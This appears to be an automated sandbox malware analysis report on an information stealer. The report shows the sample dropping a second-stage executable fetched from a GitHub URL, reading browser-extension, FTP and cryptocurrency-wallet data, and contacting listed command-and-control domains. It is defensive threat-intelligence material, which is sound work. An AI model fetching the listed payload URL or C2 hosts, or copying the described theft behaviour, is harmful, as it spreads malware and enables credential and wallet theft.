                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Directory queried: C:\Users\user\Documents
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Directory queried: C:\Users\user\Documents
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Directory queried: C:\Users\user\Documents\UOOJJOZIRH
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Directory queried: C:\Users\user\Documents\UOOJJOZIRH
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
                Source: Yara match | File source: 00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000003.1861189025.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000003.1861666105.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000003.1874370927.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000003.1860623456.0000000001436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: jyidkjkfhjawd.exe PID: 7940, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: Process Memory Space: jyidkjkfhjawd.exe PID: 7940, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Disable or Modify Tools | LSASS Memory | 321 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 331 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 331 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 12 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 32 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph ID: 1582366 | Sample: eXbhgU9.exe | Startdate: 30/12/2024 | Architecture: WINDOWS | Score: 100
                Contacted hosts: framekgirus.shop, raw.githubusercontent.com, github.com
                Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 9 other signatures
                eXbhgU9.exe (started; graph badges 15, 7): connects to github.com (140.82.121.4, 443, 49730, GITHUBUS, United States) and raw.githubusercontent.com (185.199.110.133, 443, 49731, FASTLYUS, Netherlands); dropped C:\FkSpRTrp\jyidkjkfhjawd.exe (PE32) and C:\Users\user\AppData\...\eXbhgU9.exe.log (CSV); signature: Adds a directory exclusion to Windows Defender; started jyidkjkfhjawd.exe, powershell.exe (badge 23), powershell.exe (badge 23), conhost.exe
                jyidkjkfhjawd.exe: connects to framekgirus.shop (104.21.18.19, 443, 49732, 49733, CLOUDFLARENETUS, United States); signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 7 other signatures
                powershell.exe (first instance): signatures: Found many strings related to Crypto-Wallets (likely being stolen); Loading BitLocker PowerShell Module; started conhost.exe
                powershell.exe (second instance): started conhost.exe

                Source | Detection | Scanner | Label
                eXbhgU9.exe | 13% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
                eXbhgU9.exe | 23% | Virustotal |
                eXbhgU9.exe | 100% | Joe Sandbox ML |
                Source | Detection | Scanner | Label
                C:\FkSpRTrp\jyidkjkfhjawd.exe | 100% | Avira | HEUR/AGEN.1314134
                C:\FkSpRTrp\jyidkjkfhjawd.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.enigmaprotector.com/openU | 0% | Avira URL Cloud | safe |
https://framekgirus.shop:443/apitxtPK | 100% | Avira URL Cloud | malware |
https://framekgirus.shop:443/apiD | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/api | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/Vg | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/api7 | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/R5J | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/B5 | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/j5B | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/api_ | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/25 | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/s | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/z5R | 100% | Avira URL Cloud | malware |
https://framekgirus.shop:443/api | 100% | Avira URL Cloud | malware |
abruptyopsn.shoph | 0% | Avira URL Cloud | safe |
rabidcowse.shop | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/h | 100% | Avira URL Cloud | malware |
wholersorie.shop | 100% | Avira URL Cloud | malware |
https://framekgirus.shop/Y | 100% | Avira URL Cloud | malware |
cloudewahsj.shop | 100% | Avira URL Cloud | malware |
nearycrepso.shop | 100% | Avira URL Cloud | malware |
https://framekgirus.shop:443/apin.txtPK | 100% | Avira URL Cloud | malware |
noisycuttej.shop | 100% | Avira URL Cloud | malware |
http://www.enigmaprotector.com/ | 0% | Avira URL Cloud | safe |
https://framekgirus.shop/ | 100% | Avira URL Cloud | malware |
tirepublicerj.shop | 100% | Avira URL Cloud | malware |
framekgirus.shop | 100% | Avira URL Cloud | malware |
abruptyopsn.shop | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 140.82.121.4 | true | false | | high
raw.githubusercontent.com | 185.199.110.133 | true | false | | high
framekgirus.shop | 104.21.18.19 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://framekgirus.shop/api | true | Avira URL Cloud: malware | unknown
abruptyopsn.shoph | true | Avira URL Cloud: safe | unknown
rabidcowse.shop | true | Avira URL Cloud: malware | unknown
wholersorie.shop | true | Avira URL Cloud: malware | unknown
https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe | false | | high
cloudewahsj.shop | true | Avira URL Cloud: malware | unknown
noisycuttej.shop | true | Avira URL Cloud: malware | unknown
nearycrepso.shop | true | Avira URL Cloud: malware | unknown
https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe | false | | high
framekgirus.shop | true | Avira URL Cloud: malware | unknown
tirepublicerj.shop | true | Avira URL Cloud: malware | unknown
abruptyopsn.shop | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.18.19 | framekgirus.shop | United States | 13335 | CLOUDFLARENETUS | true
140.82.121.4 | github.com | United States | 36459 | GITHUBUS | false
185.199.110.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582366
Start date and time: 2024-12-30 11:58:32 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: eXbhgU9.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/12@3/3
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 71%
                                                                                                                • Number of executed functions: 165
                                                                                                                • Number of non-executed functions: 28
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 4.245.163.56, 13.107.246.45
                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7660 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                TimeTypeDescription
                                                                                                                05:59:24API Interceptor21x Sleep call for process: powershell.exe modified
                                                                                                                05:59:34API Interceptor31x Sleep call for process: eXbhgU9.exe modified
                                                                                                                05:59:38API Interceptor8x Sleep call for process: jyidkjkfhjawd.exe modified
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                                                                                                • github.com/ssbb36/stv/raw/main/5.mp3
                                                                                                                185.199.110.133sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                raw.githubusercontent.comPurchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.108.133
                                                                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.108.133
                                                                                                                Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.111.133
                                                                                                                NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.109.133
                                                                                                                OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 185.199.108.133
                                                                                                                8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                                                • 185.199.111.133
                                                                                                                Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.108.133
                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.109.133
                                                                                                                github.comfxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 20.233.83.145
                                                                                                                Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 20.233.83.145
                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 20.233.83.145
                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 20.233.83.145
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 20.233.83.145
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                • 20.233.83.145
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                • 20.233.83.145
                                                                                                                ORDER-241221K6890PF57682456POC7893789097393.j.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • 20.233.83.145
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                • 20.233.83.145
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                CLOUDFLARENETUSPO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                • 188.114.97.3
                                                                                                                Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                • 172.67.144.225
                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 172.67.144.225
                                                                                                                NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                • 172.67.144.225
                                                                                                                Jx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 162.159.128.233
                                                                                                                Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                • 188.114.97.3
                                                                                                                Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 188.114.96.3
                                                                                                                6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                FASTLYUSPurchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.108.133
                                                                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.108.133
                                                                                                                Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.111.133
                                                                                                                NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                                                • 151.101.2.137
                                                                                                                star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                • 167.83.165.108
                                                                                                                EFT Payment_Transcript__Survitecgroup.htmlGet hashmaliciousUnknownBrowse
                                                                                                                • 151.101.2.137
                                                                                                                installeasyassist.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 151.101.65.21
                                                                                                                https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.htmlGet hashmaliciousUnknownBrowse
                                                                                                                • 151.101.129.44
                                                                                                                GITHUBUSrQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 192.30.252.154
                                                                                                                https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                • 140.82.112.3
                                                                                                                file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                • 140.82.121.4
                                                                                                                x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                                                • 140.82.113.4
                                                                                                                ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                                                                • 140.82.121.4
                                                                                                                3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                • 140.82.113.4
                                                                                                                https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 140.82.113.22
                                                                                                                PO24002292.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • 140.82.121.4
                                                                                                                CORREIO BCV.zip.htmlGet hashmaliciousUnknownBrowse
                                                                                                                • 140.82.112.22
                                                                                                                https://github.com/karakun/OpenWebStart/releases/download/v1.10.1/OpenWebStart_windows-x64_1_10_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 140.82.121.4
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eSupplier.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                a0e9f5d64349fb13191bc781f81f42e1PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                • 104.21.18.19
                                                                                                                universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.18.19
                                                                                                                Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                • 104.21.18.19
                                                                                                                universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.18.19
                                                                                                                6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.18.19
                                                                                                                lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                • 104.21.18.19
                                                                                                                vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 104.21.18.19
                                                                                                                AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 104.21.18.19
                                                                                                                R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.18.19
                                                                                                                No context

Process: C:\Users\user\Desktop\eXbhgU9.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1282048
Entropy (8bit): 7.989392691400588
Encrypted: false
SSDEEP: 24576:tI05w/i0EgOp2bAntruwSB/n5FqAmHrnaNWQu2/O7pOuSLBLX:tI05w/i0Ed2buawK/qAmLGWx7pOLLBz
MD5: 1B40450E11F71DA7D6F3D9C025C078E0
SHA1: 5BDF461219E68AA7175A5FA01962AF8E3F583C7E
SHA-256: F7846A193C00E22D512FDC71FCA6FB3F3AF434179681D26700B11B7F4E69AB64
